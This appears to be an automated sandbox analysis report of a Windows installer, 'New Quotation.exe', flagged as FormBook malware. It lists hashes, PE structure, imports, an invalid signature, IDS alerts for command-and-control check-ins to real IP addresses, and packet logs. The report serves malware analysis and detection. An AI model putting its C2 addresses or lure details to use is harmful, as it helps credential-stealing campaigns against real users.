                                                                                                                                                                                        SHA-256:416AF5046ED7239D1A473361773592DA33C98AC6A333A694BD894D16D9242F79
                                                                                                                                                                                        SHA-512:6CA027A4A64C452036BAA79D4D90E99157F92EA80CF2069F252A78B3B5FADA527C871D7CB3D8436990B34F8750B8D8F9363AE5FB3D4095C8265681576954E0F6
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:.PNG........IHDR................a....sBIT....|.d....JIDAT8..... .C..k..g%.hqF....$.c..T.....d.0....Y.[$:.4p-2..9G...W.$].m../.})4.E....IEND.B`.

                                                                                                                                                                                        Static File Info

                                                                                                                                                                                        General

                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                        Entropy (8bit):7.21647933889392
                                                                                                                                                                                        TrID:
                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                        File name:New Quotation.exe
                                                                                                                                                                                        File size:197080
                                                                                                                                                                                        MD5:c69011df1fdebc08f5098a7f4d6098d2
                                                                                                                                                                                        SHA1:bf2f7b8a13510e3086862c1e308734654269d35a
                                                                                                                                                                                        SHA256:bfc7d8f7a7cca1215bd7dd211488ce0220cb4ca66b6d59a3eb8bc69047e6ac1d
                                                                                                                                                                                        SHA512:c6c712cd0e010b9800af4743a39f1f11eddc72fb2cb67787b7125afbd3d75a0f824131962fcc495dc8616c186f25c6146db9cd1a28bca1637459f37a397fa44d
                                                                                                                                                                                        SSDEEP:6144:SbE/HUc48U7rnWUeS4O4n8B6vHrrAnERH9My2Y6:Sb8UHnWhO4Nvrknaa3
                                                                                                                                                                                        TLSH:521402606B60D4A7EDA107309D7B9F768EF6DD6468616F4B13203E4C3E32BE19A0E354
                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

                                                                                                                                                                                        File Icon

                                                                                                                                                                                        Icon Hash:00f0f0e965f0f030

                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                        General

                                                                                                                                                                                        Entrypoint:0x40352d
                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                        Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                        Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6

                                                                                                                                                                                        Authenticode Signature

                                                                                                                                                                                        Signature Valid:false
                                                                                                                                                                                        Signature Issuer:CN="SPDBRNSPLEJERSKERS Fugleflugt Kvindehadere Unimbued9 ", O=Regnbuerreders, L=Street, S=England, C=GB
                                                                                                                                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                        Error Number:-2146762487
                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                        • 10/06/2022 00:26:56 10/06/2023 00:26:56
                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                        • CN="SPDBRNSPLEJERSKERS Fugleflugt Kvindehadere Unimbued9 ", O=Regnbuerreders, L=Street, S=England, C=GB
                                                                                                                                                                                        Version:3
                                                                                                                                                                                        Thumbprint MD5:B02AC8698589C37DD8503CED73DF861D
                                                                                                                                                                                        Thumbprint SHA-1:F93CF1DC3B7758177B3D1456941A129A7860CF19
                                                                                                                                                                                        Thumbprint SHA-256:F63EA98BEDEBF6DBB8EA47CB3C8D3F01D5A74DB58CE2B188E6C1C87A849F13BA
                                                                                                                                                                                        Serial:4A67A04B97C04ABA

                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                        Instruction
                                                                                                                                                                                        push ebp
                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                        sub esp, 000003F4h
                                                                                                                                                                                        push ebx
                                                                                                                                                                                        push esi
                                                                                                                                                                                        push edi
                                                                                                                                                                                        push 00000020h
                                                                                                                                                                                        pop edi
                                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                                        push 00008001h
                                                                                                                                                                                        mov dword ptr [ebp-14h], ebx
                                                                                                                                                                                        mov dword ptr [ebp-04h], 0040A2E0h
                                                                                                                                                                                        mov dword ptr [ebp-10h], ebx
                                                                                                                                                                                        call dword ptr [004080CCh]
                                                                                                                                                                                        mov esi, dword ptr [004080D0h]
                                                                                                                                                                                        lea eax, dword ptr [ebp-00000140h]
                                                                                                                                                                                        push eax
                                                                                                                                                                                        mov dword ptr [ebp-0000012Ch], ebx
                                                                                                                                                                                        mov dword ptr [ebp-2Ch], ebx
                                                                                                                                                                                        mov dword ptr [ebp-28h], ebx
                                                                                                                                                                                        mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                                                                                                                        call esi
                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                        jne 00007F4450BB53DAh
                                                                                                                                                                                        lea eax, dword ptr [ebp-00000140h]
                                                                                                                                                                                        mov dword ptr [ebp-00000140h], 00000114h
                                                                                                                                                                                        push eax
                                                                                                                                                                                        call esi
                                                                                                                                                                                        mov ax, word ptr [ebp-0000012Ch]
                                                                                                                                                                                        mov ecx, dword ptr [ebp-00000112h]
                                                                                                                                                                                        sub ax, 00000053h
                                                                                                                                                                                        add ecx, FFFFFFD0h
                                                                                                                                                                                        neg ax
                                                                                                                                                                                        sbb eax, eax
                                                                                                                                                                                        mov byte ptr [ebp-26h], 00000004h
                                                                                                                                                                                        not eax
                                                                                                                                                                                        and eax, ecx
                                                                                                                                                                                        mov word ptr [ebp-2Ch], ax
                                                                                                                                                                                        cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                                                                                                                        jnc 00007F4450BB53AAh
                                                                                                                                                                                        and word ptr [ebp-00000132h], 0000h
                                                                                                                                                                                        mov eax, dword ptr [ebp-00000134h]
                                                                                                                                                                                        movzx ecx, byte ptr [ebp-00000138h]
                                                                                                                                                                                        mov dword ptr [00434FB8h], eax
                                                                                                                                                                                        xor eax, eax
                                                                                                                                                                                        mov ah, byte ptr [ebp-0000013Ch]
                                                                                                                                                                                        movzx eax, ax
                                                                                                                                                                                        or eax, ecx
                                                                                                                                                                                        xor ecx, ecx
                                                                                                                                                                                        mov ch, byte ptr [ebp-2Ch]
                                                                                                                                                                                        movzx ecx, cx
                                                                                                                                                                                        shl eax, 10h
                                                                                                                                                                                        or eax, ecx

                                                                                                                                                                                        Rich Headers

                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                                        Data Directories

                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x6e0000xf9f8.rsrc
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x2e3000x1ed8.data
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                        Sections

                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                        .text0x10000x68970x6a00False0.6661261792452831data6.458398214928006IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        .rdata0x80000x14a60x1600False0.4392755681818182data5.024109281264143IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        .data0xa0000x2b0180x600False0.521484375data4.15458210408643IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        .ndata0x360000x380000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        .rsrc0x6e0000xf9f80xfa00False0.5601875data5.404465594665211IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                        Resources

                                                                                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                                                                                        RT_ICON0x6e3b80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295EnglishUnited States
                                                                                                                                                                                        RT_ICON0x725e00x3228dBase IV DBT of \200.DBF, blocks size 0, block length 12800, next free block index 40, next free block 4294967295, next used block 4294967295EnglishUnited States
                                                                                                                                                                                        RT_ICON0x758080x25a8dataEnglishUnited States
                                                                                                                                                                                        RT_ICON0x77db00x1ca8dataEnglishUnited States
                                                                                                                                                                                        RT_ICON0x79a580x10a8dataEnglishUnited States
                                                                                                                                                                                        RT_ICON0x7ab000xca8dataEnglishUnited States
                                                                                                                                                                                        RT_ICON0x7b7a80x988dataEnglishUnited States
                                                                                                                                                                                        RT_ICON0x7c1300x748dataEnglishUnited States
                                                                                                                                                                                        RT_ICON0x7c8780x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                        RT_ICON0x7cce00x368GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                        RT_DIALOG0x7d0480x100dataEnglishUnited States
                                                                                                                                                                                        RT_DIALOG0x7d1480x11cdataEnglishUnited States
                                                                                                                                                                                        RT_DIALOG0x7d2680xc4dataEnglishUnited States
                                                                                                                                                                                        RT_DIALOG0x7d3300x60dataEnglishUnited States
                                                                                                                                                                                        RT_GROUP_ICON0x7d3900x92dataEnglishUnited States
                                                                                                                                                                                        RT_VERSION0x7d4280x290MS Windows COFF PA-RISC object fileSlovakSlovakia
                                                                                                                                                                                        RT_MANIFEST0x7d6b80x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                                                                                        Imports

                                                                                                                                                                                        DLLImport
                                                                                                                                                                                        ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                                                                                                                        SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                                                                                                                        ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                                                                                                                        COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                                                                                                                        USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                                                                                                                        GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                                                                                                                        KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                        EnglishUnited States
                                                                                                                                                                                        SlovakSlovakia

                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                        Snort IDS Alerts

                                                                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                        192.168.11.20172.105.250.3449787802031449 06/10/22-07:57:15.871020TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978780192.168.11.20172.105.250.34
                                                                                                                                                                                        192.168.11.20116.204.133.14849790802031412 06/10/22-07:57:57.610744TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979080192.168.11.20116.204.133.148
                                                                                                                                                                                        192.168.11.208.214.69.4849786802031412 06/10/22-07:56:57.136375TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978680192.168.11.208.214.69.48
                                                                                                                                                                                        192.168.11.20116.204.133.14849790802031453 06/10/22-07:57:57.610744TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979080192.168.11.20116.204.133.148
                                                                                                                                                                                        192.168.11.20216.58.212.14749779802031449 06/10/22-07:54:52.807904TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977980192.168.11.20216.58.212.147
                                                                                                                                                                                        192.168.11.20172.105.250.3449787802031412 06/10/22-07:57:15.871020TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978780192.168.11.20172.105.250.34
                                                                                                                                                                                        192.168.11.20116.204.133.14849790802031449 06/10/22-07:57:57.610744TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979080192.168.11.20116.204.133.148
                                                                                                                                                                                        192.168.11.208.214.69.4849786802031453 06/10/22-07:56:57.136375TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978680192.168.11.208.214.69.48
                                                                                                                                                                                        192.168.11.20172.105.250.3449787802031453 06/10/22-07:57:15.871020TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978780192.168.11.20172.105.250.34
                                                                                                                                                                                        192.168.11.2046.38.243.23449784802031412 06/10/22-07:56:15.261794TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978480192.168.11.2046.38.243.234
                                                                                                                                                                                        192.168.11.2046.38.243.23449784802031453 06/10/22-07:56:15.261794TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978480192.168.11.2046.38.243.234
                                                                                                                                                                                        192.168.11.208.214.69.4849786802031449 06/10/22-07:56:57.136375TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978680192.168.11.208.214.69.48
                                                                                                                                                                                        192.168.11.2046.38.243.23449784802031449 06/10/22-07:56:15.261794TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978480192.168.11.2046.38.243.234
                                                                                                                                                                                        192.168.11.20216.58.212.14749779802031412 06/10/22-07:54:52.807904TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977980192.168.11.20216.58.212.147
                                                                                                                                                                                        192.168.11.20216.58.212.14749779802031453 06/10/22-07:54:52.807904TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977980192.168.11.20216.58.212.147

                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Jun 10, 2022 07:52:16.035237074 CEST49764443192.168.11.20142.250.186.110
                                                                                                                                                                                        Jun 10, 2022 07:52:16.035311937 CEST44349764142.250.186.110192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:16.035645008 CEST49764443192.168.11.20142.250.186.110
                                                                                                                                                                                        Jun 10, 2022 07:52:16.065058947 CEST49764443192.168.11.20142.250.186.110
                                                                                                                                                                                        Jun 10, 2022 07:52:16.065107107 CEST44349764142.250.186.110192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:16.118782043 CEST44349764142.250.186.110192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:16.118956089 CEST49764443192.168.11.20142.250.186.110
                                                                                                                                                                                        Jun 10, 2022 07:52:16.118983030 CEST49764443192.168.11.20142.250.186.110
                                                                                                                                                                                        Jun 10, 2022 07:52:16.120712042 CEST44349764142.250.186.110192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:16.120898008 CEST49764443192.168.11.20142.250.186.110
                                                                                                                                                                                        Jun 10, 2022 07:52:16.264236927 CEST49764443192.168.11.20142.250.186.110
                                                                                                                                                                                        Jun 10, 2022 07:52:16.264344931 CEST44349764142.250.186.110192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:16.265157938 CEST44349764142.250.186.110192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:16.265289068 CEST49764443192.168.11.20142.250.186.110
                                                                                                                                                                                        Jun 10, 2022 07:52:16.271686077 CEST49764443192.168.11.20142.250.186.110
                                                                                                                                                                                        Jun 10, 2022 07:52:16.314574003 CEST44349764142.250.186.110192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:16.994379997 CEST44349764142.250.186.110192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:16.994563103 CEST49764443192.168.11.20142.250.186.110
                                                                                                                                                                                        Jun 10, 2022 07:52:16.994630098 CEST44349764142.250.186.110192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:16.994669914 CEST44349764142.250.186.110192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:16.994771957 CEST49764443192.168.11.20142.250.186.110
                                                                                                                                                                                        Jun 10, 2022 07:52:16.996278048 CEST49764443192.168.11.20142.250.186.110
                                                                                                                                                                                        Jun 10, 2022 07:52:16.996330023 CEST44349764142.250.186.110192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.161216021 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.161232948 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.161422014 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.161797047 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.161807060 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.212563992 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.212697029 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.212743044 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.213432074 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.213638067 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.213646889 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.217478037 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.217519999 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.217700958 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.217885017 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.218291998 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.258595943 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.438831091 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.439028025 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.440749884 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.440962076 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.440993071 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.442069054 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.442260981 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.442291975 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.442302942 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.444763899 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.445020914 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.445067883 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.445271015 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.446096897 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.446249962 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.446291924 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.446487904 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.458302975 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.458518028 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.458563089 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.458759069 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.458971024 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.459227085 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.459273100 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.459507942 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.460284948 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.460489035 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.460532904 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.460799932 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.461678982 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.461921930 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.461968899 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.462116003 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.462950945 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.463114977 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.463156939 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.463381052 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.464324951 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.464520931 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.464565039 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.464761019 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.465687990 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.465909958 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.465951920 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.466207981 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.467020988 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.467227936 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.467266083 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.467535019 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.468306065 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.468554020 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.468600035 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.468794107 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.469506979 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.469677925 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.469719887 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.469918013 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.470698118 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.470913887 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.470964909 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.471437931 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.471822023 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.472006083 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.472042084 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.472062111 CEST44349765172.217.19.65192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.472213030 CEST49765443192.168.11.20172.217.19.65
                                                                                                                                                                                        Jun 10, 2022 07:52:17.472987890 CEST44349765172.217.19.65192.168.11.20
